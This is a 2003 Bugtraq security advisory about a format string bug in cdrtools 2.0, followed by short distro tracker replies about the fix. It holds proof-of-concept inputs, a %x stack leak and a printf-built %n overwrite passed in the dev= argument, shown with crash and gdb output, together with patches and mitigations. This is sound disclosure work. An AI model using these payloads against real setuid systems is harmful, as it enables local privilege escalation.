cdrtools2.0 Format String Vulnerability From: Stefano Di Paola <st0r1e@libero.it> To: bugtraq@securityfocus.com Date: Yesterday 10.27.36 ---------------------------------------------------------------------------- PACKAGE : cdrtools VERSION : 2.0 SUMMARY : Format String SEVERITY : local root exploit if suid (on several distros) DATE: : 2003-05-05 ---------------------------------------------------------------------------- Hi, i would inform you that there is a format string vulnerability in cdrecord 2.0 and in particular in libscg/scsiopen.c in line 273, i suppose: -------------------------------------------------------------- 271 if (scg__open(scgp, devname) <= 0) { 272 if (errs && scgp->errstr) >>>273 js_snprintf(errs, slen, scgp->errstr);<<<< 274 scg_sfree(scgp); 275 return ((SCSI *)0); 276 } _______________________________________________________ !------- W A R N I N G -----------! !--- this is an exploitable vulnerability! ---! !----------------------------------------------! Cdrecord is present in several distros as setuid program so this is a real security hole. e.g. $ ./cdrecord dev="AAAA|%x%x%x%x%x%x%x%x%x%x%x" int.c Cdrecord 2.0 (i586-pc-linux-gnu) Copyright (C) 1995-2002 Jrg Schilling scsidev: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x' devname: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x' scsibus: -2 target: -2 lun: -2 Warning: Open by 'devname' is unintentional and not supported. ./cdrecord: File o directory inesistente. Cannot open 'AAAABBBBCCCC|65bffff6743808b7c8ffffffff000fffffffe4141414142424242. Cannot open SCSI driver. ./cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you are root. as you can see th last %x refers to AAAABBBBCCC so i can use %n for overwriting. anything i want: e.g. i can find on the stack the location of the return address... let's say 0xbffcffcc: $./cdrecord dev=`printf "\xec\xed\xff\xbfBBBBCCCC|%%x%%x%%x%%x%%x%%x%%x%%x%%n"` c/int.c .....snip.... (core dump) $ gdb `which cdrecord` core -q ....snip... #0 0x3f in ?? () (gdb) bt #0 0x3f in ?? () #1 0x8065451 in scg_open () #2 0x8049a3b in main () ... so it's exploitable. Solutions: A. Updated package can be found on: ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz B. Replace line 273 of liscg/scsiopen.c with : js_snprintf(errs, slen, "%s", scgp->errstr); C. remove the suid bit with: chmod 755 `which cdrecord` Regards, Stefano Di Paola ------------------ Stefano Di Paola Software Engineer stefano.dipaola1<at>tin<dot>it st0r1e<at>libero<dot>com
We don't install cdrecord SUID root. The users are free to do that, of course, and I think some GUI cd burners can do that for the user. That said, it appears that the bug is fixed in 2.01_alpha14, which has been in the CVS (~arch-masked) since May 12.
I meant "the ebuild for which has been in the CVS..."
glsa sent
